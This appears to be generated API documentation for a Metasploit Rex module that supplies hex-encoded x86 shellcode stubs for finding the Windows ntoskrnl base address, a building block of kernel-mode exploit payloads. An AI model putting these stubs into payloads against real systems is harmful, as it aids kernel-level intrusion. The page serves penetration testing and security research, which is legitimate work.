Module: Rex::Payloads::Win32::Kernel::Common

Defined in:

lib/rex/payloads/win32/kernel/common.rb

Overview

This class provides common methods that may be shared across more than one kernel-mode payload. Many of these are from the following paper:

www.uninformed.org/?v=3&a=4&t=sumry

Class Method Summary

• .find_nt_idt_eeye ⇒ Object

  Returns a stub that will find the base address of ntoskrnl and place it in eax.

• .find_nt_kdversionblock ⇒ Object

  Returns a stub that will find the base address of ntoskrnl and place it in eax.

• .find_nt_pcr ⇒ Object

  Returns a stub that will find the base address of ntoskrnl and place it in eax.

• .resolve_call_sym ⇒ Object

  Alias for resolving symbols.

Class Method Details

.find_nt_idt_eeye ⇒ Object

Returns a stub that will find the base address of ntoskrnl and place it in eax. This method works by using an IDT entry. Credit to eEye.

# File 'lib/rex/payloads/win32/kernel/common.rb', line 21

def self.find_nt_idt_eeye
  "\x8b\x35\x38\xf0\xdf\xff\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7"
end

.find_nt_kdversionblock ⇒ Object

Returns a stub that will find the base address of ntoskrnl and place it in eax. This method uses a pointer found in KdVersionBlock.

# File 'lib/rex/payloads/win32/kernel/common.rb', line 29

def self.find_nt_kdversionblock
  "\x31\xc0\x64\x8b\x40\x34\x8b\x40\x10"
end

.find_nt_pcr ⇒ Object

Returns a stub that will find the base address of ntoskrnl and place it in eax. This method uses a pointer found in the processor control region as a starting point.

# File 'lib/rex/payloads/win32/kernel/common.rb', line 38

def self.find_nt_pcr
  "\xa1\x2c\xf1\xdf\xff\x66\x25\x01\xf0\x48\x66\x81\x38\x4d\x5a\x75\xf4"
end

.resolve_call_sym ⇒ Object

Alias for resolving symbols.

# File 'lib/rex/payloads/win32/kernel/common.rb', line 45

def self.resolve_call_sym
  Rex::Payloads::Win32::Common.resolve_call_sym
end